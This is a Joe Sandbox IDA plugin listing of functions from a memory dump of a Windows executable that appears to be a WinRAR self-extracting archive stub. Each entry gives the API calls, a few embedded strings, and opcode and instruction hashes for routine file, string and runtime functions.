Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: 34a23095aa47783c10090835dc1a46b89264eb5a539cb8b83eb26b62b1c2aa0c
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: 90A15A72D243869FEB29CF18C8917AFBBE5EF55310F14416EE4859B281C6748DE1CB50

Function 0022A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00227F69,?,?,?), ref: 0022A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00227F69,?), ref: 0022A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00227F69,?,?,?,?,?,?,?), ref: 0022A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00227F69,?,?,?,?,?,?,?,?,?,?), ref: 0022A4C6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 7f11a7a4c95ec1f63562f7fc2f72db59b0c1f4c9c23feaefaeb5282bd2176892
Instruction ID: 205868344ce0193bc5c67294db3bce08160038315986ce06d3145bb21b002032
Opcode Fuzzy Hash: 7f11a7a4c95ec1f63562f7fc2f72db59b0c1f4c9c23feaefaeb5282bd2176892
Instruction Fuzzy Hash: E441CE30258392ABD731EFA4EC49FAEBBE4AB80300F040959B5D0935C0D6A4DA6CDB53

Function 0024C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,002447C6,00000000,00000000,002457FB,?,002457FB,?,00000001,002447C6,2DE85006,00000001,002457FB,002457FB), ref: 0024C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0024CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0024CA70
__freea.LIBCMT ref: 0024CA79

Part of subcall function 00248E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00244286,?,0000015D,?,?,?,?,00245762,000000FF,00000000,?,?), ref: 00248E38

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 51ff81c29ec3195b428f14f05bc53d47240ed236fbf2a0029efaae38a745af3b
Instruction ID: 4f50e9f4fd0f48ca6d37f8a6dd62a0ab0ac08a650c2e5501881209653137fb7d
Opcode Fuzzy Hash: 51ff81c29ec3195b428f14f05bc53d47240ed236fbf2a0029efaae38a745af3b
Instruction Fuzzy Hash: ED31C372A2121AABDF29DF78DC55DAE7BA5EB01310F154128FC04E7290EB35CD60CB90

Function 0023A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0023A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0023A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0023A683
ReleaseDC.USER32(00000000,00000000), ref: 0023A691

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b6bff99845c932ab9dd8ea242b83a34d43bd900e96c8eae50a233d60700a99f2
Instruction ID: 4c0e93e1179615f51c88f520989ae84b0db24e7f754e1b3a95c2d86c943f0c17
Opcode Fuzzy Hash: b6bff99845c932ab9dd8ea242b83a34d43bd900e96c8eae50a233d60700a99f2
Instruction Fuzzy Hash: B2E01235953722B7D7619B61BC0EB8B3E68AB05F62F018211FA05EA1D0DFB486008BA1

Function 0023D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0023D11B

Strings

.lnk, xrefs: 0023D2F7, 0023D307
d#, xrefs: 0023D3C5

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$d#
API String ID: 2691759472-117726298
Opcode ID: 1e541e8ebff12ec04790ca1819d64c9faae6dbdb99c9bb16ecb0255073339a83
Instruction ID: e44699ddddf823dccb1dc81d0541e8dfcfe12e6b8b3c9c9dc519dee85a1756a4
Opcode Fuzzy Hash: 1e541e8ebff12ec04790ca1819d64c9faae6dbdb99c9bb16ecb0255073339a83
Instruction Fuzzy Hash: 86A155B2920129A6DF25DBA0DD45EFB73FC9F44304F0485A6B509E7141EE749B948F60

Function 0024B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0024B324

Part of subcall function 00249097: IsProcessorFeaturePresent.KERNEL32(00000017,00249086,00000000,00248D94,00000000,00000000,00000000,00000016,?,?,00249093,00000000,00000000,00000000,00000000,00000000), ref: 00249099
Part of subcall function 00249097: GetCurrentProcess.KERNEL32(C0000417,00248D94,00000000,?,00000003,00249868), ref: 002490BB
Part of subcall function 00249097: TerminateProcess.KERNEL32(00000000,?,00000003,00249868), ref: 002490C2

Strings

., xrefs: 0024B4DB
*?, xrefs: 0024B1FB

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: d295575e83870ec1a89ca6481ece10a10ded565e0510a6fc29cc77c8ffc4bcac
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 54519171E1020AEFDF19DFA9C881AADBBB5EF98310F2441A9E854E7340E771DE118B50

Function 002275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002275E3

Part of subcall function 002305DA: _wcslen.LIBCMT ref: 002305E0

Part of subcall function 0022A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0022A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0022777F

Part of subcall function 0022A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0022A325,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A501
Part of subcall function 0022A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0022A325,?,?,?,0022A175,?,00000001,00000000,?,?), ref: 0022A532

Strings

:, xrefs: 00227654

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 5222d049bc84b2d7d1dc5c705141d89f572a33ad6d14283e8cc6abc66e7ba66c
Instruction ID: 578bd98d425c26e89e2780e694074a4940f3146432faddf0e6a3eab0fcbdc9b1
Opcode Fuzzy Hash: 5222d049bc84b2d7d1dc5c705141d89f572a33ad6d14283e8cc6abc66e7ba66c
Instruction Fuzzy Hash: 7F419471814268BAEB21EBA4EC55EEEB37DAF51300F404096B605A7092DB745FA8CF70

Function 0022B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0022B438
_wcschr.LIBVCRUNTIME ref: 0022B478

Strings

*, xrefs: 0022B38A

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: 823f4b57660c4e5756aa0c09b327d0f3c0d3661c92a676a28f7ca8a266c51045
Instruction ID: 7bbe84b9b202c17f3228ed42d5168bffcfa07114eb0c03732af3b5eb1b9c59fc
Opcode Fuzzy Hash: 823f4b57660c4e5756aa0c09b327d0f3c0d3661c92a676a28f7ca8a266c51045
Instruction Fuzzy Hash: 25316826524332BA8B32FEC0B8A267B73E4DFA5B10F14801EFD8447043E7658D61D321

Function 0023B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023B4E3
_wcslen.LIBCMT ref: 0023B4FE

Strings

}, xrefs: 0023B4D6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 1e5fb911265dc20723163a03c87698ad4f493423657f59aae4757ee3def16304
Instruction ID: fea8e815f55ce0a82360573704bb8d5980dc7bcc67389238983a9bea4471afbd
Opcode Fuzzy Hash: 1e5fb911265dc20723163a03c87698ad4f493423657f59aae4757ee3def16304
Instruction Fuzzy Hash: B02101B29353165ACB36EE64D845B6EB3DCDF81710F40042AF780C3141EB64DD688BA2

Function 0022F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0022F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0022F2E4
Part of subcall function 0022F2C5: GetProcAddress.KERNEL32(002681C8,CryptUnprotectMemory), ref: 0022F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0022F33E), ref: 0022F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0022F3CA
CryptProtectMemory failed, xrefs: 0022F389

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 6cd9bc8e3ac4561642af71396d8180c3119033f2d3ede32b1ed45d2f15ae8462
Instruction ID: 50545451460b4eebc56e242dee0f753f732b903eaee27a8c5a231ad9e92cc675
Opcode Fuzzy Hash: 6cd9bc8e3ac4561642af71396d8180c3119033f2d3ede32b1ed45d2f15ae8462
Instruction Fuzzy Hash: FB11593262027ABBDF51EF60FE0966E3764FF05760B0482B6FC055B291DE709D318A84

Function 0022C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0022C080

Strings

?*<>|", xrefs: 0022C06D, 0022C07F
<9%, xrefs: 0022C076

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcschr
String ID: <9%$?*<>|"
API String ID: 2691759472-621574068
Opcode ID: 2984437c91ba0cda84d9831f32513e329396c1b64928ccf7363bc41ac75fe3b9
Instruction ID: 8f1a72a402b0a8d09f6aaea2aeaa96851dee7e693137e3f69709c3423dea22d6
Opcode Fuzzy Hash: 2984437c91ba0cda84d9831f32513e329396c1b64928ccf7363bc41ac75fe3b9
Instruction Fuzzy Hash: 82F0F953574323E1C7345FA5B80173AB3E4EFA5730F34041EE5C4871C2E5A18AE48695

Function 0023DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0023DBAC

Strings

Software\WinRAR SFX, xrefs: 0023DB95
#, xrefs: 0023DB9F

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen
String ID: Software\WinRAR SFX$#
API String ID: 176396367-417056093
Opcode ID: 7e9897e028e066ecf6965eb35271cec68e2fa98af466871ef4a258749e9c2a27
Instruction ID: b1379f5d3cae209d4b19178d107c42ee477435f5373d579aaee3dec05777917a
Opcode Fuzzy Hash: 7e9897e028e066ecf6965eb35271cec68e2fa98af466871ef4a258749e9c2a27
Instruction Fuzzy Hash: A8017CB1511128BAEB219F95EC0EFDF7F7DFB05794F004052F549A10A0DBB08AA8CBA1

Function 0023AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 0022C29A: _wcslen.LIBCMT ref: 0022C2A2

Part of subcall function 00231FDD: _wcslen.LIBCMT ref: 00231FE5
Part of subcall function 00231FDD: _wcslen.LIBCMT ref: 00231FF6
Part of subcall function 00231FDD: _wcslen.LIBCMT ref: 00232006
Part of subcall function 00231FDD: _wcslen.LIBCMT ref: 00232014
Part of subcall function 00231FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0022B371,?,?,00000000,?,?,?), ref: 0023202F

Part of subcall function 0023AC04: SetCurrentDirectoryW.KERNELBASE(?,0023AE72,C:\Users\user\Desktop,00000000,0026946A,00000006), ref: 0023AC08

_wcslen.LIBCMT ref: 0023AE8B

Strings

<#, xrefs: 0023AEC4
C:\Users\user\Desktop, xrefs: 0023AE68

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _wcslen$CompareCurrentDirectoryString
String ID: <#$C:\Users\user\Desktop
API String ID: 521417927-1812671549
Opcode ID: f2696209fe4bed02b85437ac5051b34fc96ba3637ccba24517179f3704a3d606
Instruction ID: 40a38fe1bbd79f88e5ee931047103352344bd0eb1aeee3806df8e2cfe5fd8afd
Opcode Fuzzy Hash: f2696209fe4bed02b85437ac5051b34fc96ba3637ccba24517179f3704a3d606
Instruction Fuzzy Hash: 2A0175B1D50319A5DF11ABA4ED0AEDE73BCAF08700F100466F545E3191EAB496A48FA5

Function 0024BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 002497E5: GetLastError.KERNEL32(?,00261098,00244674,00261098,?,?,002440EF,?,?,00261098), ref: 002497E9
Part of subcall function 002497E5: _free.LIBCMT ref: 0024981C
Part of subcall function 002497E5: SetLastError.KERNEL32(00000000,?,00261098), ref: 0024985D
Part of subcall function 002497E5: _abort.LIBCMT ref: 00249863

_abort.LIBCMT ref: 0024BB80
_free.LIBCMT ref: 0024BBB4

Strings

p%, xrefs: 0024BBAB

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: ErrorLast_abort_free
String ID: p%
API String ID: 289325740-1703017251
Opcode ID: 4a67d0744ab95124cc81930628517492bfe84e45f4dfe8dccfc5afdf8ff6e488
Instruction ID: 86c694cfd7453b6549f835128d311ebee7a656246503c1c9f2ad8bbee93c51fd
Opcode Fuzzy Hash: 4a67d0744ab95124cc81930628517492bfe84e45f4dfe8dccfc5afdf8ff6e488
Instruction Fuzzy Hash: 45018471D31B22DBCF2BAF68940261DB761FF04725B15010AFC2467695CB74AD618FC5

Function 0023B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0023B42F

Strings

(#, xrefs: 0023B457
Z#, xrefs: 0023B441

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Malloc
String ID: (#$Z#
API String ID: 2696272793-3905339191
Opcode ID: bcb39f8f105c8b17de75aa87166b579e92acae42c2eda2618a260a86e122df77
Instruction ID: 1a64bc520b82bc7f37db91e9cdc909a096d5ea14d1df5e52768a67186d0353d6
Opcode Fuzzy Hash: bcb39f8f105c8b17de75aa87166b579e92acae42c2eda2618a260a86e122df77
Instruction Fuzzy Hash: 6D0146BA611119FF9F05DFB0ED49CAEBBADEF08345B100159BA06D7120E631AA44DBA0

Function 00248268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0024BF30: GetEnvironmentStringsW.KERNEL32 ref: 0024BF39
Part of subcall function 0024BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0024BF5C
Part of subcall function 0024BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0024BF82
Part of subcall function 0024BF30: _free.LIBCMT ref: 0024BF95
Part of subcall function 0024BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0024BFA4

_free.LIBCMT ref: 002482AE
_free.LIBCMT ref: 002482B5

Strings

0"(, xrefs: 0024829B

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"(
API String ID: 400815659-1227739736
Opcode ID: 779fe2713437866bff2e724703f287db697c097e397f2e25012a581bd37e8050
Instruction ID: dbe98ad4f036e6f2d7ad0a83834929c3e42fc93aa4e81aa63ea672e71ef57591
Opcode Fuzzy Hash: 779fe2713437866bff2e724703f287db697c097e397f2e25012a581bd37e8050
Instruction Fuzzy Hash: 44E02B37A37D9291A36EB6793C0662F06408FC1338B190316FE20C70D7CED088360DA2

Function 00230FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00231101,?,?,0023117F,?,?,?,?,?,00231169), ref: 00230FEA
GetLastError.KERNEL32(?,?,0023117F,?,?,?,?,?,00231169), ref: 00230FF6

